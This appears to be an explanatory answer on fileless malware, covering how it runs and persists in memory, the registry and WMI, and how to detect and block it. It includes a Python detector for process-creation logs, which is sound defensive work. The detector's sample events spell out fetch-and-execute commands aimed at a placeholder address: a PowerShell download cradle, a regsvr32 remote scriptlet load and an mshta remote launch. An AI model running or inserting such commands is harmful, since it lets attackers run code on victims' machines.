What is fileless malware? What are some techniques for detecting it and protecting against it? Please provide a detailed description of fileless malware, a method for detecting it and at least 2 vendo

Fileless malware is malicious code that runs without writing its own executable to disk. Instead of dropping a .exe or .dll that a file-based antivirus scanner could hash and quarantine, it lives in process memory and in places the operating system already trusts: it is injected into a legitimate process, launched through built-in interpreters and administration tools such as PowerShell, WMI, mshta.exe or regsvr32.exe (the so-called living-off-the-land binaries), and, when it needs to survive a reboot, stores its payload as an encoded script in a registry value or as a WMI event subscription rather than as a file. Because the malicious logic never exists as a conventional file with a name, a hash and a directory entry, signature scanning of the file system and simple file-integrity checks do not see it (Khushali, 2020).

A typical fileless chain starts with a phishing document, a malicious link or an exploit that runs one short command on the victim. That command uses a tool already on the machine to fetch and run the next stage in memory, for example a PowerShell one-liner that downloads a script over HTTP and passes it to Invoke-Expression, or regsvr32.exe told to load a remote scriptlet, so the only thing written to disk is the benign-looking document that started it. Persistence, when the attacker wants it, is also kept off the file system: a base64-encoded command stored in a registry Run key, a scheduled task whose action is an interpreter command line, or a WMI permanent event subscription that re-launches the payload after a reboot. Since there is no malicious file to hash or quarantine, detection has to rely on behaviour: process-creation telemetry that records the parent process and the full command line (an Office application spawning PowerShell with -EncodedCommand and a hidden window is a strong signal), PowerShell script block logging and the Antimalware Scan Interface (AMSI), which expose a script's decoded content to the event log and to the antivirus engine at run time regardless of how it arrived, enumeration of WMI subscriptions and registry autoruns for script payloads, and memory scanning of running processes for injected code. Protection follows from the same observation: block or restrict the interpreters the attacker relies on (application control, PowerShell Constrained Language Mode, disabling macros in documents from the internet), patch the software the initial exploit targets, remove local administrator rights so that an in-memory payload cannot load drivers or inject into privileged processes, and keep the telemetry above flowing to a SIEM or EDR where the behaviour can be correlated.
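The following is an added example, not code from the page or from either cited paper, of the behaviour-based detection described above: it scores process-creation records (parent process plus command line) for fileless launch patterns, decodes PowerShell -EncodedCommand payloads so obfuscation does not hide the download cradle, and raises the score when an Office application is the parent. The sample events, the indicator list, the weights and the threshold are all assumptions constructed for this example, not a vendor's rule set.

```python
"""Behaviour-based detection of fileless launch chains in process-creation
telemetry (Sysmon Event ID 1 / Security Event ID 4688 style records).

Added example for this page: the events below are constructed, and the
indicator set, weights and threshold are this example's own assumptions."""
import base64
import re

# PowerShell's -EncodedCommand argument is base64 over UTF-16LE text.
ENCODED_RE = re.compile(r"-e(?:nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{20,})", re.I)

# name -> (pattern, weight). Weights are an assumption chosen for this example.
INDICATORS = {
    "hidden_window":      (re.compile(r"-w(?:indowstyle)?\s+hidden", re.I), 2),
    "no_profile":         (re.compile(r"-nop(?:rofile)?\b", re.I), 1),
    "bypass_policy":      (re.compile(r"-e(?:x(?:ecutionpolicy)?|p)\s+bypass", re.I), 2),
    "encoded_command":    (ENCODED_RE, 2),
    # Download cradle: fetch text over HTTP and hand it straight to the interpreter.
    "download_to_iex":    (re.compile(r"(?=.*\b(?:DownloadString|DownloadFile|Invoke-WebRequest|iwr)\b)"
                                      r"(?=.*\b(?:iex|Invoke-Expression)\b)", re.I | re.S), 4),
    "iex":                (re.compile(r"\b(?:iex|Invoke-Expression)\b", re.I), 1),
    "reflection_load":    (re.compile(r"\[(?:System\.)?Reflection\.Assembly\]::Load", re.I), 3),
    "regsvr32_scriptlet": (re.compile(r"regsvr32(?:\.exe)?\s.*?/i:https?://", re.I), 4),
    "mshta_remote":       (re.compile(r"mshta(?:\.exe)?\s+(?:https?:|javascript:|vbscript:)", re.I), 4),
    "wmic_xsl":           (re.compile(r"wmic(?:\.exe)?\s.*?/format:", re.I), 4),
}
OFFICE_PARENTS = {"WINWORD.EXE", "EXCEL.EXE", "POWERPNT.EXE", "OUTLOOK.EXE"}
INTERPRETER_RE = re.compile(
    r"\b(?:powershell|pwsh|cmd|wscript|cscript|mshta|rundll32|regsvr32)(?:\.exe)?\b", re.I)


def encode_powershell_command(script):
    """Produce the value an attacker would pass to -EncodedCommand (used to build the sample)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand payload, or None if absent or undecodable."""
    m = ENCODED_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def score_command_line(cmdline):
    """Score one command line. The base64 blob is masked and its decoded content
    appended, so indicators hidden behind -EncodedCommand still count."""
    decoded = decode_encoded_command(cmdline)
    text = ENCODED_RE.sub("-enc <base64>", cmdline)
    if decoded:
        text += "\n" + decoded
    score, hits = 0, []
    for name, (rx, weight) in INDICATORS.items():
        target = cmdline if name == "encoded_command" else text
        if rx.search(target):
            hits.append(name)
            score += weight
    return score, hits, decoded


def scan(events, threshold=4):
    """Return alerts for events whose combined score reaches the threshold."""
    alerts = []
    for ev in events:
        score, hits, decoded = score_command_line(ev["cmd"])
        # An Office application spawning a script interpreter is the classic
        # macro-to-PowerShell entry point for fileless infections.
        if ev["parent"].upper() in OFFICE_PARENTS and INTERPRETER_RE.search(ev["cmd"]):
            hits.append("office_spawned_interpreter")
            score += 3
        if score >= threshold:
            alerts.append({"cmd": ev["cmd"], "score": score, "hits": hits, "decoded": decoded})
    return alerts


# Constructed sample telemetry (203.0.113.0/24 is a documentation address range).
PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.7/s.ps1')"
SAMPLE_EVENTS = [
    {"parent": "WINWORD.EXE",  "cmd": "powershell.exe -nop -w hidden -enc " + encode_powershell_command(PAYLOAD)},
    {"parent": "explorer.exe", "cmd": "powershell.exe -ExecutionPolicy Bypass -File C:\\scripts\\backup.ps1"},
    {"parent": "cmd.exe",      "cmd": "regsvr32.exe /s /n /u /i:http://203.0.113.7/x.sct scrobj.dll"},
    {"parent": "explorer.exe", "cmd": "notepad.exe C:\\Users\\alice\\notes.txt"},
    {"parent": "explorer.exe", "cmd": "mshta.exe http://203.0.113.7/p.hta"},
]

if __name__ == "__main__":
    for a in scan(SAMPLE_EVENTS):
        print(f"[score {a['score']:2d}] {a['cmd'][:60]}")
        print("    indicators:", ", ".join(a["hits"]))
        if a["decoded"]:
            print("    decoded   :", a["decoded"])
```

Run as-is, the Word-spawned encoded download cradle, the regsvr32 scriptlet load and the remote .hta launch are reported; the administrator's `-ExecutionPolicy Bypass -File` run scores below the threshold, which is the trade-off such scoring makes. In production the same logic would be fed by Sysmon or 4688 events with command-line auditing enabled, and the decoded script text would additionally be available from PowerShell script block logging (Event ID 4104) even when the launch used a method this list does not cover.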

Much traditional malware also does things that look suspicious on disk, such as writing an executable, adding a registry Run value that points at it and starting it as a new process, and those artefacts are exactly what file-based antivirus catches. Fileless implants leave a different trail, and the most dangerous ones run in kernel memory: DOUBLEPULSAR, the kernel-mode backdoor published in the Shadow Brokers leak and installed by WannaCry, lives entirely in kernel memory, accepts commands over the same SMB port that the EternalBlue exploit used to plant it, and injects DLLs into user-mode processes, so the beacon back to the command-and-control server and any follow-on code execution never touch the file system. An attacker who reaches this point with a memory-corruption exploit that defeats ASLR, or who only wants to run an in-memory cryptocurrency miner such as TETRA Miner, gets the same benefit: the activity is visible only in memory and in the process and network behaviour it causes (Xiong et al., 2020).

References

Khushali, V (2020). A Review on Fileless Malware Analysis Techniques.

Xiong, C., Zhu, T., Dong, W., Ruan, L., Yang, R., Chen, Y., ... & Chen, X. (2020). CONAN: A Practical Real-time APT Detection System with High Accuracy and Efficiency. IEEE Transactions on Dependable and Secure Computing.